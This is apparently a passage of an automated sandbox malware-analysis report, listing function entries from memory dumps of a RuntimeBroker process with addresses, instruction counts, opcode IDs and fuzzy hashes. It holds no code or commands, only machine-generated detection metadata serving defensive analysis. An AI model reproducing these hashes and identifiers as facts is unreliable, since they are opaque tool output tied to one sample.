                                                      • Opcode ID: fe7d4b0cceb505c55aec057c1103937f383ed4bfe90368f05ae1e76ebdeeb4ee
                                                      • Instruction ID: f1d5bdcc8e648c342f0c55b69fb260bd7d70b9d692a16981f95b1bf9cd10b7c1
                                                      • Opcode Fuzzy Hash: fe7d4b0cceb505c55aec057c1103937f383ed4bfe90368f05ae1e76ebdeeb4ee
                                                      • Instruction Fuzzy Hash: 70E0127184E7D44FD706EB74886A8557FA0EE67211B4A41EEC085CF1B3D62D8845C701
                                                      Function 00007FF848EC3749 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 23997f13607ec351811e02ed312d71d293ec2d4290c0ed4a9b438c5863b58d74
                                                      • Instruction ID: 83a484478e084617147a5668031d45fe7c02657b20421187584aae367b88d3a6
                                                      • Opcode Fuzzy Hash: 23997f13607ec351811e02ed312d71d293ec2d4290c0ed4a9b438c5863b58d74
                                                      • Instruction Fuzzy Hash: BEE01A6194E7C04FCB1AEB3488798557FA0EE6731078A41EEC045CF1B3E62D8849C701
                                                      Function 00007FF848EA1349 Relevance: .5, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40f961b2d1363fdce3430419e5c082ec3722bc278ff0656a2dd33576e3d0af99
                                                      • Instruction ID: 2b834eb20b90a77ddddcf34068d9416385fd3925834a1dbba3b2ae5d2836a8ea
                                                      • Opcode Fuzzy Hash: 40f961b2d1363fdce3430419e5c082ec3722bc278ff0656a2dd33576e3d0af99
                                                      • Instruction Fuzzy Hash: DA025430E1CA5A9FEB98FB28949177973A1FF54B80F1445B9D00ED3287CF39A8418B45
                                                      Function 00007FF848E908D0 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f217464d80534e7dc3f5fed0ec2400cd88ae21ea758447eeddc0f07e6ce06f9
                                                      • Instruction ID: bef722991c4f4c9984b2649a11badf68ecc38dbf4faa025d1b1b42e493544200
                                                      • Opcode Fuzzy Hash: 9f217464d80534e7dc3f5fed0ec2400cd88ae21ea758447eeddc0f07e6ce06f9
                                                      • Instruction Fuzzy Hash: 92416F51A4D9563EE309B7BCA0962FC7B80FF453A9F1844BBD04DC71E7DE286881C698
                                                      Function 00007FF848E90998 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8de22818cefd8bcafc3c1de363bbcc78b42b8c99d50ad4d8730078418be1e9c6
                                                      • Instruction ID: 9b803785744b8ccf80cbfe89e8233d8f33f70ad0b1517d625fdf6b517f55b7d4
                                                      • Opcode Fuzzy Hash: 8de22818cefd8bcafc3c1de363bbcc78b42b8c99d50ad4d8730078418be1e9c6
                                                      • Instruction Fuzzy Hash: B631E720B1DD5D6FE798F76C448A67972C1FF98359F5000B9E40EC32D7DE689C818644
                                                      Function 00007FF848E91171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a17ff92591a6e8aed8b7267139cf613948a16ceb98f5a0557478e13edb7723e1
                                                      • Instruction ID: 95ab1d226de6024d617ae9237f535c740b1503749744165eef9b29f7bb1385c0
                                                      • Opcode Fuzzy Hash: a17ff92591a6e8aed8b7267139cf613948a16ceb98f5a0557478e13edb7723e1
                                                      • Instruction Fuzzy Hash: 8F31B030A0D68A8FDB46FB64C8549A97BF0FF16340F0901FAC009D72A3EB79A845C751
                                                      Function 00007FF848EC2979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9616d0b8327d2a7e57481f721adf55ed0a485714d2f1c0b707bc3cc5a594cf20
                                                      • Instruction ID: d6650761ae7cd658bd0b11721d36704b449bb79009d3ec146aa0c03c9167668d
                                                      • Opcode Fuzzy Hash: 9616d0b8327d2a7e57481f721adf55ed0a485714d2f1c0b707bc3cc5a594cf20
                                                      • Instruction Fuzzy Hash: A1318631E0CA4A8FD754EA18C4956B873A2FB98360F04467AC00ED72C7CF38AC418B85
                                                      Function 00007FF848E90960 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed5aa33c6020f30edb84b7e1ebea38e17886f6329f10f423602031b6f3057ed4
                                                      • Instruction ID: e3788642aefcea7a25a8434599c1cc5b24a19e7b0ad947c3c3609ec1241f23e5
                                                      • Opcode Fuzzy Hash: ed5aa33c6020f30edb84b7e1ebea38e17886f6329f10f423602031b6f3057ed4
                                                      • Instruction Fuzzy Hash: 6A216751A4DD5A3EF65C72BC608A2F822C1FF483A9F1840BAE40DC31E3CD6CAC804698
                                                      Function 00007FF848E92A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction ID: 45cc82dd7392b2ebb5d80bde3321ae951944a704ece72f49c5a5f416bb756b35
                                                      • Opcode Fuzzy Hash: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction Fuzzy Hash: 85217122E0C90A4FEBA4FAA884547BC22D2FF943A4F9445B5D41DD3293DFB8AC408748
                                                      Function 00007FF848E90C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08da099025fbebd6f48213f202d00b19846a51463a9607e4143fd05cb38799d9
                                                      • Instruction ID: 341f200f8f912381be5fa46681226142e6e18c16852647095cc55a0a4b2594d5
                                                      • Opcode Fuzzy Hash: 08da099025fbebd6f48213f202d00b19846a51463a9607e4143fd05cb38799d9
                                                      • Instruction Fuzzy Hash: BA210531A0C6899FE311FBA8C8452EC7BB0FF42398F5445B6C0448B1D2DB781589CB45
                                                      Function 00007FF848EA6D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ba61dcd472087a9ca150256a00e79688ae7cf61c713fa985634999fb5434df5
                                                      • Instruction ID: fa93aae6be6c5cc7f200c0460ededd4e18d9fa10ec4d7d1e4261ed8aab61ffe5
                                                      • Opcode Fuzzy Hash: 0ba61dcd472087a9ca150256a00e79688ae7cf61c713fa985634999fb5434df5
                                                      • Instruction Fuzzy Hash: 52114F31E0CA1A8FEA98FB6884556B972D2FF98740F5005BAD50ED72D6DF78AC024784
                                                      Function 00007FF848E93D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d356d9d0ff9462b06a91a29cd04f60571fc602890bcdeb50c894e6c79cf4c49
                                                      • Instruction ID: ff9bad647daf5f69a012c73b04babc535927f04d8427afc75ba8698baaffcb43
                                                      • Opcode Fuzzy Hash: 3d356d9d0ff9462b06a91a29cd04f60571fc602890bcdeb50c894e6c79cf4c49
                                                      • Instruction Fuzzy Hash: 4311EC70D08A198FDB94EB08C894BA973E1FB58315F1441BAD40EE72A0DB74AEC4CF85
                                                      Function 00007FF848EC7180 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24544eff7a88e982933d0b6bb3d304a448fa49df45eb384ab4f53e3670e8626e
                                                      • Instruction ID: 4d7ae4f5fd71fa0be9c18334aa3d16aed8ddcbb35687c7ded30f3ad5af8f2608
                                                      • Opcode Fuzzy Hash: 24544eff7a88e982933d0b6bb3d304a448fa49df45eb384ab4f53e3670e8626e
                                                      • Instruction Fuzzy Hash: 29014956D8E9922ED30C76BCB8560F83B90EF0227AF0C90B7D08CCA163DE0850898799
                                                      Function 00007FF848E90C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction ID: 90e284778c9897b2c1963e39e1f766ee646615f2b69f5ad0d015767f3a853dbf
                                                      • Opcode Fuzzy Hash: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction Fuzzy Hash: EF11CE31A0C6899FE702FBA8C8412EC7FB0FF42354F5544B6C080DB292D67816498785
                                                      Function 00007FF848ECD67A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b60fe05860ebf782a65654f61dc001fcf892e63be4007166410e591ca9a22b8b
                                                      • Instruction ID: 5680b1efbfdd8a2f54f45ad829ebe8f7b59af1fdfb7326df5332f3a1e42024aa
                                                      • Opcode Fuzzy Hash: b60fe05860ebf782a65654f61dc001fcf892e63be4007166410e591ca9a22b8b
                                                      • Instruction Fuzzy Hash: CD017133F089098FEB54AA58D4817FC77A2FB887A0F054031D01DE7185DB3AA9869754
                                                      Function 00007FF848E90C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction ID: 6f2ab1f09430ffa3630ad3130ee30b940f2f52c7e742a361bd0d77d3400a4c34
                                                      • Opcode Fuzzy Hash: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction Fuzzy Hash: B3018C31A0D7899FE702FBA8C8842ED7FB0FF42354F5545A6C480DB292DA785649CB85
                                                      Function 00007FF848EA44B1 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47b38da51319100d22b7b79d76fc9a141f1aa524fb1aa2b6fd32194d8f041c6b
                                                      • Instruction ID: f9eed623bd7347df14723c937f4247e6662f50db8f584df296767df12bad4915
                                                      • Opcode Fuzzy Hash: 47b38da51319100d22b7b79d76fc9a141f1aa524fb1aa2b6fd32194d8f041c6b
                                                      • Instruction Fuzzy Hash: BCF04C31D0D6864FF722B62484152BA3B92BF91758F0802BBC44EC70D3DEBC59068355
                                                      Function 00007FF848EA833C Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42fc2cde2bada008d7e0727d40e39cb9ab2845b8f1da50931bef09ea3eff8954
                                                      • Instruction ID: 8d67eca172cdcfa3a2cd7a761abffd47c2c34ece88d15245dc8df04233fb0cec
                                                      • Opcode Fuzzy Hash: 42fc2cde2bada008d7e0727d40e39cb9ab2845b8f1da50931bef09ea3eff8954
                                                      • Instruction Fuzzy Hash: 39017821E0C95A9FFA94FA548495AA93291FF55780F1441B6D80DD32C2DF786D418B84
                                                      Function 00007FF848E90C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aaeb7a745910c7b27e207537ba0738f33cfbc8811ffb0d654c04b249fa9101b1
                                                      • Instruction ID: 2f4664481486e7c145ededd656483344333770c92159c6374260d3ef5a69129f
                                                      • Opcode Fuzzy Hash: aaeb7a745910c7b27e207537ba0738f33cfbc8811ffb0d654c04b249fa9101b1
                                                      • Instruction Fuzzy Hash: DD017C7190D7899FE702EB78C8842DDBFB0FF42354F5541E6D040DB2A2DA785A89C781
                                                      Function 00007FF848EA3F68 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3853b62c0e677b08e67bea7704004841f0a1687cd5a13e39afaf0ae7294fda03
                                                      • Instruction ID: 331a7c3ffe5b85266ea3dbc80e6ecc131f855b7c56a6a2f84e53634b8e6bae1e
                                                      • Opcode Fuzzy Hash: 3853b62c0e677b08e67bea7704004841f0a1687cd5a13e39afaf0ae7294fda03
                                                      • Instruction Fuzzy Hash: 2C014B70E0860B8FEB58AB4DD8556FEBBA0FF54750F10063AD01AC2294DF7869818B84
                                                      Function 00007FF848E94F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1ef1cedbeff2b7052b5ae04b075919ad9e7485a3e2023ebb6308ad3185f0258
                                                      • Instruction ID: 85bd43ee3622babc346eab0fafdf78b220f740562af1dfb48c65c52d8b59d7ea
                                                      • Opcode Fuzzy Hash: e1ef1cedbeff2b7052b5ae04b075919ad9e7485a3e2023ebb6308ad3185f0258
                                                      • Instruction Fuzzy Hash: 3B01DF31E0D52A8FEBA1BBA884942B87B90FF54358F1401B6C40ED3282DFBC29418B44
                                                      Function 00007FF848ECAD59 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e07a00c0968755e7cdd72ad9a4dfa71ba7156e8ab9b587aa50db60bd0de0502f
                                                      • Instruction ID: 9c14f86d6d2a75967365e079fa2e891ca687a72c0fd12dd97650e0766c062518
                                                      • Opcode Fuzzy Hash: e07a00c0968755e7cdd72ad9a4dfa71ba7156e8ab9b587aa50db60bd0de0502f
                                                      • Instruction Fuzzy Hash: 3FF0EC31B1CBC44FC729553D58590717FE1DB9B51234942FFC096C76A3DD54AC868341
                                                      Function 00007FF848E90C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e559d1192308e1dea2ad8082b29f88e65467c80ed945322e5a66698c5c31aad5
                                                      • Instruction ID: 85a9c8abbaf60d7b8646a8c09db957f98f90011fa9d83c5884423fc9c584ca24
                                                      • Opcode Fuzzy Hash: e559d1192308e1dea2ad8082b29f88e65467c80ed945322e5a66698c5c31aad5
                                                      • Instruction Fuzzy Hash: 90014B7090D7899FE702EBA4848429DBFB0FF02358F5441E6D440DB296DA785A88C745
                                                      Function 00007FF848EA3FBF Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0ec9d66a02d5e72351d29a3b32be38a32ed5db217ef71cce7545b501d14e72b
                                                      • Instruction ID: bf3d2b619cb2fdf0f16903a1defa4204e8437f6b4e8f257ecbc18da94356c539
                                                      • Opcode Fuzzy Hash: b0ec9d66a02d5e72351d29a3b32be38a32ed5db217ef71cce7545b501d14e72b
                                                      • Instruction Fuzzy Hash: 0DF04F70E0860B8FEB98EB5CD4556FE7BB0FB54751F00063AC016C3284DF346A458B94
                                                      Function 00007FF848E92B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: cdd74dee04ca8fb85ac5ba2d365fea55664557de4b60efd14d4495fd03ccf38f
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: E8F03C3194C85E8EEFB4FA54C8446EC73A2FB903A5F5442B5D41DD31A2DFF8A9818B48
                                                      Function 00007FF848ECB0DA Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78fca05a948664b9f2421f4a68e36389f2dba3ef390e4c24f37468a4e0cda244
                                                      • Instruction ID: ddefb7fbfd743fa70b4b2cc4af2528391ed5578b578e5d1311f354cfb34d2853
                                                      • Opcode Fuzzy Hash: 78fca05a948664b9f2421f4a68e36389f2dba3ef390e4c24f37468a4e0cda244
                                                      • Instruction Fuzzy Hash: 3FF05870E1D94A8FE289FB29449A3B9B2D2FB98781F5401B6C40DD3283DF3868829745
                                                      Function 00007FF848EA47C4 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 6028a07b818d318b6dc8bbf82d6592ee15bb7edc6183e22a099b74a39caf88df
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 74F05E30D0C6078FEA58FA1894406BA33E5FF44798F114575D95EC32D7EF78AC524688
                                                      Function 00007FF848E90B77 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b61cf4c546c5c40b025e0d04081fe64969569a2375d68c9b868f9d688e4ab09
                                                      • Instruction ID: 4e3951dd73a2a4532de53ca4690c97c5c97b6ab19a8c2ec3b32213a0d9f1f113
                                                      • Opcode Fuzzy Hash: 9b61cf4c546c5c40b025e0d04081fe64969569a2375d68c9b868f9d688e4ab09
                                                      • Instruction Fuzzy Hash: 69F0A03525EA89DFC742AB3C88A58D4BF60FF03204B9A11E9D089CB562C325585DCB42
                                                      Function 00007FF848EC3459 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6a516eeeca051f70cff10dc3659df74206d18d9f11ccd9d154eecc60c1f2d4ec
                                                      • Instruction ID: 104ae21dba82e7f004831b58070346f12cf21488816193e9f16cccc7ca4b55e4
                                                      • Opcode Fuzzy Hash: 6a516eeeca051f70cff10dc3659df74206d18d9f11ccd9d154eecc60c1f2d4ec
                                                      • Instruction Fuzzy Hash: 3BE09220609BC84FC70EA63848685607FB1EB6711179A02DBC045CB2A3DA19DCC9C751
                                                      Function 00007FF848ECD969 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2eb1dd88d800be1454e70ffdd19ea27d549c550ec4ebbf562ee0637e42e2945a
                                                      • Instruction ID: 09922805c42297e298718d0ec3b4ac9cc9669afcc983f779d682b489eaf360b8
                                                      • Opcode Fuzzy Hash: 2eb1dd88d800be1454e70ffdd19ea27d549c550ec4ebbf562ee0637e42e2945a
                                                      • Instruction Fuzzy Hash: 9BE04F7294E7C08FC74BAB3488B88503F60EE2721174A41EAC046CF5B3DA6A8849C701
                                                      Function 00007FF848ECD8E9 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23738da43ab39dc700d96564b9e7df6ea98d0704d443d7cf42b29ecd9c3b4286
                                                      • Instruction ID: e82aa00ceb74e11048daa693c2cf60a158195c14e97fbd83c64f8bacf953adb5
                                                      • Opcode Fuzzy Hash: 23738da43ab39dc700d96564b9e7df6ea98d0704d443d7cf42b29ecd9c3b4286
                                                      • Instruction Fuzzy Hash: E8E01A7294E7C08FC70BAB3588B88503F60EE1761174A41EAC045CF5B3D62A8849C712
                                                      Function 00007FF848EC7C44 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
